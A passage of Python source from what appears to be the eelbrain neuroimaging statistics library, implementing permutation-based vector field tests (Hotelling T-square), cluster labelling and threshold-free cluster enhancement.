return self._statistic_map
def table(self, title=None, caption=None):
"""Table listing all effects and corresponding smallest p-values
Parameters
----------
title : text
Title for the table.
caption : text
Caption for the table.
Returns
-------
table : eelbrain.fmtxt.Table
ANOVA table.
"""
table = fmtxt.Table('rlr' + ('' if self.p is None else 'rl'), title=title, caption=caption)
table.cells('#', 'Effect', 'f_max')
if self.p is not None:
table.cells('p', 'sig')
table.midrule()
for i in range(len(self.effects)):
table.cell(i)
table.cell(self.effects[i])
table.cell(fmtxt.stat(self.f[i].max()))
if self.p is not None:
pmin = self.p[i].min()
table.cell(fmtxt.p(pmin))
table.cell(star(pmin))
return table
class Vector(NDDifferenceTest):
"""Test a vector field for vectors with non-random direction
Parameters
----------
y : NDVar
Dependent variable (needs to include one vector dimension).
match : None | categorial
Combine data for these categories before testing.
sub : index
Perform test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Number of cases.
difference : NDVar
The vector field averaged across cases.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or ``None`` if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
Notes
-----
Vector tests are based on the Hotelling T-Square statistic. Computation of
the T-Square statistic relies on [1]_.
References
----------
.. [1] Kopp, J. (2008). Efficient numerical diagonalization of hermitian 3 x
3 matrices. International Journal of Modern Physics C, 19(3), 523-548.
`10.1142/S0129183108012303 <https://doi.org/10.1142/S0129183108012303>`_
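    Examples
    --------
    A minimal sketch; ``ds``, ``'v'`` and ``'subject'`` are hypothetical names
    for a Dataset, a vector-valued NDVar and a subject Factor:
    >>> result = Vector('v', match='subject', ds=ds, samples=1000)  # hypothetical data
    >>> average = result.difference  # average vector field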
"""
_state_specific = ('difference', 'n', '_v_dim', 't2')
@user_activity
def __init__(
self,
y: NDVarArg,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
ct = Celltable(y, match=match, sub=sub, ds=ds, coercion=asndvar, dtype=np.float64)
n = len(ct.y)
cdist = NDPermutationDistribution(ct.y, samples, tmin, tfce, 1, 'norm', 'Vector test', tstart, tstop, criteria, parc, force_permutation)
v_dim = ct.y.dimnames[cdist._vector_ax + 1]
v_mean = ct.y.mean('case')
v_mean_norm = v_mean.norm(v_dim)
if not use_norm:
t2_map = self._vector_t2_map(ct.y)
cdist.add_original(t2_map.x if v_mean.ndim > 1 else t2_map)
if v_mean.ndim == 1:
self.t2 = t2_map
else:
self.t2 = NDVar(t2_map, v_mean_norm.dims, _info.for_stat_map('t2'), 't2')
else:
cdist.add_original(v_mean_norm.x if v_mean.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator)
# store attributes
NDTest.__init__(self, ct.y, ct.match, sub, samples, tfce, None, cdist, tstart, tstop)
self.difference = v_mean
self._v_dim = v_dim
self.n = n
self._expand_state()
def __setstate__(self, state):
if 'diff' in state:
state['difference'] = state.pop('diff')
NDTest.__setstate__(self, state)
@property
def _statistic(self):
return 'norm' if self.t2 is None else 't2'
def _name(self):
if self.y:
return f"Vector test: {self.y}"
else:
return "Vector test"
def _repr_test_args(self):
args = []
if self.y:
args.append(repr(self.y))
if self.match:
args.append(f'match={self.match!r}')
return args
@staticmethod
def _vector_perm(y, out, seed, use_norm):
n_cases, n_dims, n_tests = y.shape
assert n_dims == 3
rotation = rand_rotation_matrices(n_cases, seed)
if use_norm:
return vector.mean_norm_rotated(y, rotation, out)
else:
return vector.t2_stat_rotated(y, rotation, out)
@staticmethod
def _vector_t2_map(y):
dimnames = y.get_dimnames(first=('case', 'space'))
x = y.get_data(dimnames)
t2_map = stats.t2_1samp(x)
if y.ndim == 2:
return np.float64(t2_map)
else:
dims = y.get_dims(dimnames[2:])
return NDVar(t2_map, dims)
class VectorDifferenceIndependent(Vector):
"""Test difference between two vector fields for non-random direction
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Combine cases with the same cell on ``x % match``.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Total number of cases.
n1 : int
Number of cases in ``c1``.
n0 : int
Number of cases in ``c0``.
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
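    Examples
    --------
    A minimal sketch; ``ds``, ``'v'`` and ``'group'`` are hypothetical names
    for a Dataset, a vector-valued NDVar and a Factor with cells
    ``'patient'`` and ``'control'``:
    >>> result = VectorDifferenceIndependent('v', 'group', 'patient', 'control', ds=ds, samples=1000)  # hypothetical data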
"""
    _state_specific = ('difference', 'c1_mean', 'c0_mean', 'n', '_v_dim', 't2')
_statistic = 'norm'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: str = None,
c0: str = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: bool = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
y, y1, y0, c1, c0, match, x_name, c1_name, c0_name = _independent_measures_args(y, x, c1, c0, match, ds, sub, True)
self.n1 = len(y1)
self.n0 = len(y0)
self.n = len(y)
cdist = NDPermutationDistribution(y, samples, tmin, tfce, 1, 'norm', 'Vector test (independent)', tstart, tstop, criteria, parc, force_permutation)
self._v_dim = v_dim = y.dimnames[cdist._vector_ax + 1]
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self.difference = self.c1_mean - self.c0_mean
self.difference.name = 'difference'
v_mean_norm = self.difference.norm(v_dim)
if not use_norm:
raise NotImplementedError("t2 statistic not implemented for VectorDifferenceIndependent")
else:
cdist.add_original(v_mean_norm.x if self.difference.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator, self.n1)
NDTest.__init__(self, y, match, sub, samples, tfce, None, cdist, tstart, tstop)
self._expand_state()
def _name(self):
if self.y:
return f"Vector test (independent): {self.y}"
else:
return "Vector test (independent)"
@staticmethod
def _vector_perm(y, n1, out, seed, use_norm):
assert use_norm
n_cases, n_dims, n_tests = y.shape
assert n_dims == 3
# randomize directions
rotation = rand_rotation_matrices(n_cases, seed)
# randomize groups
cases = np.arange(n_cases)
np.random.shuffle(cases)
# group 1
mean_1 = np.zeros((n_dims, n_tests))
for case in cases[:n1]:
mean_1 += np.tensordot(rotation[case], y[case], ((1,), (0,)))
mean_1 /= n1
# group 0
mean_0 = np.zeros((n_dims, n_tests))
for case in cases[n1:]:
mean_0 += np.tensordot(rotation[case], y[case], ((1,), (0,)))
mean_0 /= (n_cases - n1)
# difference
mean_1 -= mean_0
norm = scipy.linalg.norm(mean_1, 2, axis=0)
if out is not None:
out[:] = norm
return norm
class VectorDifferenceRelated(NDMaskedC1Mixin, Vector):
"""Test difference between two vector fields for non-random direction
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Units within which measurements are related (e.g. 'subject' in a
within-subject comparison).
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Number of cases.
c1_mean : NDVar
Mean in the ``c1`` condition.
c0_mean : NDVar
Mean in the ``c0`` condition.
difference : NDVar
Difference between the mean in condition ``c1`` and condition ``c0``.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or ``None`` if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
See Also
--------
Vector : One-sample vector test, notes on vector test implementation
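    Examples
    --------
    A minimal sketch; ``ds``, ``'v'``, ``'condition'`` and ``'subject'`` are
    hypothetical names for a Dataset, a vector-valued NDVar and two Factors:
    >>> result = VectorDifferenceRelated('v', 'condition', 'a', 'b', match='subject', ds=ds, samples=1000)  # hypothetical data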
"""
    _state_specific = ('difference', 'c1_mean', 'c0_mean', 'n', '_v_dim', 't2')
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: str = None,
c0: str = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: bool = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
y1, y0, c1, c0, match, n, x_name, c1, c1_name, c0, c0_name = _related_measures_args(y, x, c1, c0, match, ds, sub, True)
difference = y1 - y0
difference.name = 'difference'
n_samples, samples = _resample_params(n, samples)
cdist = NDPermutationDistribution(difference, n_samples, tmin, tfce, 1, 'norm', 'Vector test (related)', tstart, tstop, criteria, parc, force_permutation)
v_dim = difference.dimnames[cdist._vector_ax + 1]
v_mean = difference.mean('case')
v_mean_norm = v_mean.norm(v_dim)
if not use_norm:
t2_map = self._vector_t2_map(difference)
cdist.add_original(t2_map.x if v_mean.ndim > 1 else t2_map)
if v_mean.ndim == 1:
self.t2 = t2_map
else:
self.t2 = NDVar(t2_map, v_mean_norm.dims, _info.for_stat_map('t2'), 't2')
else:
cdist.add_original(v_mean_norm.x if v_mean.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(n_samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator)
# store attributes
NDTest.__init__(self, difference, match, sub, samples, tfce, None, cdist, tstart, tstop)
self.difference = v_mean
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._v_dim = v_dim
self.n = n
self._expand_state()
def _name(self):
if self.y:
return f"Vector test (related): {self.y}"
else:
return "Vector test (related)"
def flatten(array, connectivity):
"""Reshape SPM buffer array to 2-dimensional map for connectivity processing
Parameters
----------
array : ndarray
N-dimensional array (with non-adjacent dimension at first position).
connectivity : Connectivity
N-dimensional connectivity.
Returns
-------
flat_array : ndarray
The input array reshaped if necessary, making sure that input and output
arrays share the same underlying data buffer.
"""
if array.ndim == 2 or not connectivity.custom:
return array
else:
out = array.reshape((array.shape[0], -1))
assert out.base is array
return out
def flatten_1d(array):
if array.ndim == 1:
return array
else:
out = array.ravel()
assert out.base is array
return out
def label_clusters(stat_map, threshold, tail, connectivity, criteria):
"""Label clusters
Parameters
----------
stat_map : array
Statistical parameter map (non-adjacent dimension on the first
axis).
Returns
-------
cmap : np.ndarray of uint32
Array with clusters labelled as integers.
cluster_ids : np.ndarray of uint32
Identifiers of the clusters that survive the minimum duration
criterion.
"""
cmap = np.empty(stat_map.shape, np.uint32)
bin_buff = np.empty(stat_map.shape, np.bool8)
cmap_flat = flatten(cmap, connectivity)
if tail == 0:
int_buff = np.empty(stat_map.shape, np.uint32)
int_buff_flat = flatten(int_buff, connectivity)
else:
int_buff = int_buff_flat = None
cids = _label_clusters(stat_map, threshold, tail, connectivity, criteria,
cmap, cmap_flat, bin_buff, int_buff, int_buff_flat)
return cmap, cids
def _label_clusters(stat_map, threshold, tail, conn, criteria, cmap, cmap_flat,
bin_buff, int_buff, int_buff_flat):
"""Find clusters on a statistical parameter map
Parameters
----------
stat_map : array
Statistical parameter map (non-adjacent dimension on the first
axis).
cmap : array of int
Buffer for the cluster id map (will be modified).
Returns
-------
cluster_ids : np.ndarray of uint32
Identifiers of the clusters that survive the minimum duration
criterion.
"""
# compute clusters
if tail >= 0:
bin_map_above = np.greater(stat_map, threshold, bin_buff)
cids = _label_clusters_binary(bin_map_above, cmap, cmap_flat, conn,
criteria)
if tail <= 0:
bin_map_below = np.less(stat_map, -threshold, bin_buff)
if tail < 0:
cids = _label_clusters_binary(bin_map_below, cmap, cmap_flat, conn,
criteria)
else:
cids_l = _label_clusters_binary(bin_map_below, int_buff,
int_buff_flat, conn, criteria)
x = cmap.max()
int_buff[bin_map_below] += x
cids_l += x
cmap += int_buff
cids = np.concatenate((cids, cids_l))
return cids
def label_clusters_binary(bin_map, connectivity, criteria=None):
"""Label clusters in a boolean map
Parameters
----------
bin_map : numpy.ndarray
Binary map.
connectivity : Connectivity
Connectivity corresponding to ``bin_map``.
criteria : dict
Cluster criteria.
Returns
-------
cmap : numpy.ndarray of uint32
Array with clusters labelled as integers.
cluster_ids : numpy.ndarray of uint32
Sorted identifiers of the clusters that survive the selection criteria.
"""
cmap = np.empty(bin_map.shape, np.uint32)
cmap_flat = flatten(cmap, connectivity)
cids = _label_clusters_binary(bin_map, cmap, cmap_flat, connectivity, criteria)
return cmap, cids
def _label_clusters_binary(bin_map, cmap, cmap_flat, connectivity, criteria):
"""Label clusters in a binary array
Parameters
----------
bin_map : np.ndarray
Binary map of where the parameter map exceeds the threshold for a
cluster (non-adjacent dimension on the first axis).
cmap : np.ndarray
Array in which to label the clusters.
cmap_flat : np.ndarray
Flat copy of cmap (ndim=2, only used when all_adjacent==False)
connectivity : Connectivity
Connectivity.
criteria : None | list
        Cluster size criteria: list of ``(axes, v)`` tuples. For each tuple,
        collapse over ``axes`` and require a minimum extent of ``v``.
Returns
-------
cluster_ids : np.ndarray of uint32
Sorted identifiers of the clusters that survive the selection criteria.
"""
# find clusters
n = ndimage.label(bin_map, connectivity.struct, cmap)
if n <= 1:
# in older versions, n is 1 even when no cluster is found
if n == 0 or cmap.max() == 0:
return np.array((), np.uint32)
else:
cids = np.array((1,), np.uint32)
elif connectivity.custom:
cids = merge_labels(cmap_flat, n, *connectivity.custom[0])
else:
cids = np.arange(1, n + 1, 1, np.uint32)
# apply minimum cluster size criteria
if criteria and cids.size:
for axes, v in criteria:
cids = np.setdiff1d(cids,
[i for i in cids if np.count_nonzero(np.equal(cmap, i).any(axes)) < v],
True)
if cids.size == 0:
break
return cids
def tfce(stat_map, tail, connectivity, dh=0.1):
tfce_im = np.empty(stat_map.shape, np.float64)
tfce_im_1d = flatten_1d(tfce_im)
bin_buff = np.empty(stat_map.shape, np.bool8)
int_buff = np.empty(stat_map.shape, np.uint32)
int_buff_flat = flatten(int_buff, connectivity)
int_buff_1d = flatten_1d(int_buff)
return _tfce(stat_map, tail, connectivity, tfce_im, tfce_im_1d, bin_buff, int_buff,
int_buff_flat, int_buff_1d, dh)
def _tfce(stat_map, tail, conn, out, out_1d, bin_buff, int_buff,
int_buff_flat, int_buff_1d, dh=0.1, e=0.5, h=2.0):
"Threshold-free cluster enhancement"
out.fill(0)
# determine slices
if tail == 0:
hs = chain(np.arange(-dh, stat_map.min(), -dh),
np.arange(dh, stat_map.max(), dh))
elif tail < 0:
hs = np.arange(-dh, stat_map.min(), -dh)
else:
hs = np.arange(dh, stat_map.max(), dh)
# label clusters in slices at different heights
# fill each cluster with total section value
# each point's value is the vertical sum
for h_ in hs:
if h_ > 0:
np.greater_equal(stat_map, h_, bin_buff)
h_factor = h_ ** h
else:
np.less_equal(stat_map, h_, bin_buff)
h_factor = (-h_) ** h
c_ids = _label_clusters_binary(bin_buff, int_buff, int_buff_flat, conn, None)
tfce_increment(c_ids, int_buff_1d, out_1d, e, h_factor)
return out
class StatMapProcessor:
def __init__(self, tail, max_axes, parc):
"""Reduce a statistical map to the relevant maximum statistic"""
self.tail = tail
self.max_axes = max_axes
self.parc = parc
def max_stat(self, stat_map):
if self.tail == 0:
v = np.abs(stat_map, stat_map).max(self.max_axes)
elif self.tail > 0:
v = stat_map.max(self.max_axes)
else:
v = -stat_map.min(self.max_axes)
if self.parc is None:
return v
else:
return [v[idx].max() for idx in self.parc]
class TFCEProcessor(StatMapProcessor):
def __init__(self, tail, max_axes, parc, shape, connectivity, dh):
StatMapProcessor.__init__(self, tail, max_axes, parc)
self.shape = shape
self.connectivity = connectivity
self.dh = dh
# Pre-allocate memory buffers used for cluster processing
self._bin_buff = np.empty(shape, np.bool8)
self._int_buff = np.empty(shape, np.uint32)
self._tfce_im = np.empty(shape, np.float64)
self._tfce_im_1d = flatten_1d(self._tfce_im)
self._int_buff_flat = flatten(self._int_buff, connectivity)
self._int_buff_1d = flatten_1d(self._int_buff)
def max_stat(self, stat_map):
v = _tfce(
stat_map, self.tail, self.connectivity, self._tfce_im, self._tfce_im_1d,
self._bin_buff, self._int_buff, self._int_buff_flat, self._int_buff_1d,
self.dh,
).max(self.max_axes)
if self.parc is None:
return v
else:
return [v[idx].max() for idx in self.parc]
class ClusterProcessor(StatMapProcessor):
def __init__(self, tail, max_axes, parc, shape, connectivity, threshold,
criteria):
StatMapProcessor.__init__(self, tail, max_axes, parc)
self.shape = shape
self.connectivity = connectivity
self.threshold = threshold
self.criteria = criteria
# Pre-allocate memory buffers used for cluster processing
self._bin_buff = np.empty(shape, np.bool8)
self._cmap = np.empty(shape, np.uint32)
self._cmap_flat = flatten(self._cmap, connectivity)
if tail == 0:
self._int_buff = np.empty(shape, np.uint32)
self._int_buff_flat = flatten(self._int_buff, connectivity)
else:
self._int_buff = self._int_buff_flat = None
def max_stat(self, stat_map, threshold=None):
if threshold is None:
threshold = self.threshold
cmap = self._cmap
cids = _label_clusters(stat_map, threshold, self.tail, self.connectivity,
self.criteria, cmap, self._cmap_flat,
self._bin_buff, self._int_buff,
self._int_buff_flat)
if self.parc is not None:
v = []
for idx in self.parc:
clusters_v = ndimage.sum(stat_map[idx], cmap[idx], cids)
if len(clusters_v):
if self.tail <= 0:
np.abs(clusters_v, clusters_v)
v.append(clusters_v.max())
else:
v.append(0)
return v
elif len(cids):
clusters_v = ndimage.sum(stat_map, cmap, cids)
if self.tail <= 0:
np.abs(clusters_v, clusters_v)
return clusters_v.max()
else:
return 0
def get_map_processor(kind, *args):
if kind == 'tfce':
return TFCEProcessor(*args)
elif kind == 'cluster':
return ClusterProcessor(*args)
elif kind == 'raw':
return StatMapProcessor(*args)
else:
raise ValueError("kind=%s" % repr(kind))
class NDPermutationDistribution:
"""Accumulate information on a cluster statistic.
Parameters
----------
y : NDVar
Dependent variable.
samples : int
Number of permutations.
threshold : scalar > 0
Threshold-based clustering.
tfce : bool | scalar
Threshold-free cluster enhancement.
tail : 1 | 0 | -1
Which tail(s) of the distribution to consider. 0 is two-tailed,
whereas 1 only considers positive values and -1 only considers
negative values.
meas : str
Label for the parameter measurement (e.g., 't' for t-values).
name : None | str
Name for the comparison.
tstart, tstop : None | scalar
Restrict the time window for finding clusters (None: use the whole
epoch).
criteria : dict
Dictionary with threshold criteria for cluster size: 'mintime'
(seconds) and 'minsource' (n_sources).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation : bool
Conduct permutations regardless of whether there are any clusters.
Notes
-----
Use of the NDPermutationDistribution proceeds in 3 steps:
- initialize the NDPermutationDistribution object: ``cdist = NDPermutationDistribution(...)``
- use a copy of y cropped to the time window of interest:
      ``y = cdist.y_perm``
- add the actual statistical map with ``cdist.add_original(pmap)``
- if any clusters are found (``if cdist.n_clusters``):
- proceed to add statistical maps from permuted data with
``cdist.add_perm(pmap)``.
Permutation data shape: case, [vector, ][non-adjacent, ] ...
internal shape: [non-adjacent, ] ...
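    A schematic sketch of that sequence (``y``, ``t_map`` and ``permuted_maps``
    are placeholders for actual data):
    >>> cdist = NDPermutationDistribution(y, 1000, 2.0, tail=1, meas='t')  # placeholder data
    >>> cdist.add_original(t_map)
    >>> if cdist.n_clusters:
    ...     for perm_t_map in permuted_maps:  # placeholder iterable
    ...         cdist.add_perm(perm_t_map)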
"""
tfce_warning = None
def __init__(self, y, samples, threshold, tfce=False, tail=0, meas='?', name=None,
tstart=None, tstop=None, criteria={}, parc=None, force_permutation=False):
assert y.has_case
assert parc is None or isinstance(parc, str)
if tfce and threshold:
raise RuntimeError(f"threshold={threshold!r}, tfce={tfce!r}: mutually exclusive parameters")
elif tfce:
if tfce is not True:
tfce = abs(tfce)
kind = 'tfce'
elif threshold:
threshold = float(threshold)
kind = 'cluster'
assert threshold > 0
else:
kind = 'raw'
# vector: will be removed for stat_map
vector = [d._connectivity_type == 'vector' for d in y.dims[1:]]
has_vector_ax = any(vector)
if has_vector_ax:
vector_ax = vector.index(True)
else:
vector_ax = None
# prepare temporal cropping
if (tstart is None) and (tstop is None):
y_perm = y
self._crop_for_permutation = False
self._crop_idx = None
else:
t_ax = y.get_axis('time') - 1
y_perm = y.sub(time=(tstart, tstop))
# for stat-maps
if vector_ax is not None and vector_ax < t_ax:
t_ax -= 1
t_slice = y.time._array_index(slice(tstart, tstop))
self._crop_for_permutation = True
self._crop_idx = FULL_AXIS_SLICE * t_ax + (t_slice,)
dims = list(y_perm.dims[1:])
if has_vector_ax:
del dims[vector_ax]
# custom connectivity: move non-adjacent connectivity to first axis
custom = [d._connectivity_type == 'custom' for d in dims]
n_custom = sum(custom)
if n_custom > 1:
raise NotImplementedError("More than one axis with custom connectivity")
nad_ax = None if n_custom == 0 else custom.index(True)
if nad_ax:
swapped_dims = list(dims)
swapped_dims[0], swapped_dims[nad_ax] = dims[nad_ax], dims[0]
else:
swapped_dims = dims
connectivity = Connectivity(swapped_dims, parc)
assert connectivity.vector is None
# cluster map properties
ndim = len(dims)
# prepare cluster minimum size criteria
if criteria:
criteria_ = []
for k, v in criteria.items():
                m = re.match(r'min(\w+)', k)
if m:
dimname = m.group(1)
if not y.has_dim(dimname):
raise TypeError(
"%r is an invalid keyword argument for this testnd "
"function (no dimension named %r)" % (k, dimname))
ax = y.get_axis(dimname) - 1
if dimname == 'time':
v = int(ceil(v / y.time.tstep))
else:
raise TypeError("%r is an invalid keyword argument for this testnd function" % (k,))
if nad_ax:
if ax == 0:
ax = nad_ax
elif ax == nad_ax:
ax = 0
axes = tuple(i for i in range(ndim) if i != ax)
criteria_.append((axes, v))
if kind != 'cluster':
# here so that invalid keywords raise explicitly
err = ("Can not use cluster size criteria when doing "
"threshold free cluster evaluation")
raise ValueError(err)
else:
criteria_ = None
# prepare distribution
samples = int(samples)
if parc:
for parc_ax, parc_dim in enumerate(swapped_dims):
if parc_dim.name == parc:
break
else:
raise ValueError("parc=%r (no dimension named %r)" % (parc, parc))
if parc_dim._connectivity_type == 'none':
parc_indexes = np.arange(len(parc_dim))
elif kind == 'tfce':
raise NotImplementedError(
f"TFCE for parc={parc!r} ({parc_dim.__class__.__name__} dimension)")
elif parc_dim._connectivity_type == 'custom':
if not hasattr(parc_dim, 'parc'):
raise NotImplementedError(f"parc={parc!r}: dimension has no parcellation")
parc_indexes = tuple(np.flatnonzero(parc_dim.parc == cell) for
cell in parc_dim.parc.cells)
parc_dim = Categorial(parc, parc_dim.parc.cells)
else:
raise NotImplementedError(f"parc={parc!r}")
dist_shape = (samples, len(parc_dim))
dist_dims = ('case', parc_dim)
max_axes = tuple(chain(range(parc_ax), range(parc_ax + 1, ndim)))
else:
dist_shape = (samples,)
dist_dims = None
max_axes = None
parc_indexes = None
# arguments for the map processor
shape = tuple(map(len, swapped_dims))
if kind == 'raw':
map_args = (kind, tail, max_axes, parc_indexes)
elif kind == 'tfce':
dh = 0.1 if tfce is True else tfce
map_args = (kind, tail, max_axes, parc_indexes, shape, connectivity, dh)
else:
map_args = (kind, tail, max_axes, parc_indexes, shape, connectivity, threshold, criteria_)
self.kind = kind
self.y_perm = y_perm
self.dims = tuple(dims) # external stat map dims (cropped time)
self.shape = shape # internal stat map shape
self._connectivity = connectivity
self.samples = samples
self.dist_shape = dist_shape
self._dist_dims = dist_dims
self._max_axes = max_axes
self.dist = None
self.threshold = threshold
self.tfce = tfce
self.tail = tail
self._nad_ax = nad_ax
self._vector_ax = vector_ax
self.tstart = tstart
self.tstop = tstop
self.parc = parc
self.meas = meas
self.name = name
self._criteria = criteria_
self.criteria = criteria
self.map_args = map_args
self.has_original = False
self.do_permutation = False
self.dt_perm = None
self._finalized = False
self._init_time = current_time()
self._host = socket.gethostname()
self.force_permutation = force_permutation
from .. import __version__
self._version = __version__
def _crop(self, im):
"Crop an original stat_map"
if self._crop_for_permutation:
return im[self._crop_idx]
else:
return im
def uncrop(
self,
ndvar: NDVar, # NDVar to uncrop
to: NDVar, # NDVar that has the target time dimensions
default: float = 0, # value to fill in uncropped area
):
if self.tstart is None and self.tstop is None:
return ndvar
target_time = to.get_dim('time')
t_ax = ndvar.get_axis('time')
dims = list(ndvar.dims)
dims[t_ax] = target_time
shape = list(ndvar.shape)
shape[t_ax] = len(target_time)
t_slice = target_time._array_index(slice(self.tstart, self.tstop))
x = np.empty(shape, ndvar.x.dtype)
x.fill(default)
x[FULL_AXIS_SLICE * t_ax + (t_slice,)] = ndvar.x
return NDVar(x, dims, ndvar.info, ndvar.name)
def add_original(self, stat_map):
"""Add the original statistical parameter map.
Parameters
----------
stat_map : array
Parameter map of the statistic of interest (uncropped).
"""
if self.has_original:
raise RuntimeError("Original pmap already added")
logger = logging.getLogger(__name__)
logger.debug("Adding original parameter map...")
# crop/reshape stat_map
stat_map = self._crop(stat_map)
if self._nad_ax:
stat_map = stat_map.swapaxes(0, self._nad_ax)
# process map
if self.kind == 'tfce':
dh = 0.1 if self.tfce is True else self.tfce
self.tfce_warning = max(stat_map.max(), -stat_map.min()) < dh
cmap = tfce(stat_map, self.tail, self._connectivity, dh)
cids = None
n_clusters = cmap.max() > 0
elif self.kind == 'cluster':
cmap, cids = label_clusters(stat_map, self.threshold, self.tail,
self._connectivity, self._criteria)
n_clusters = len(cids)
# clean original cluster map
idx = np.in1d(cmap, cids, invert=True).reshape(self.shape)
cmap[idx] = 0
else:
cmap = stat_map
cids = None
n_clusters = True
self._t0 = current_time()
self._original_cluster_map = cmap
self._cids = cids
self.n_clusters = n_clusters
self.has_original = True
self.dt_original = self._t0 - self._init_time
self._original_param_map = stat_map
if self.force_permutation or (self.samples and n_clusters):
self._create_dist()
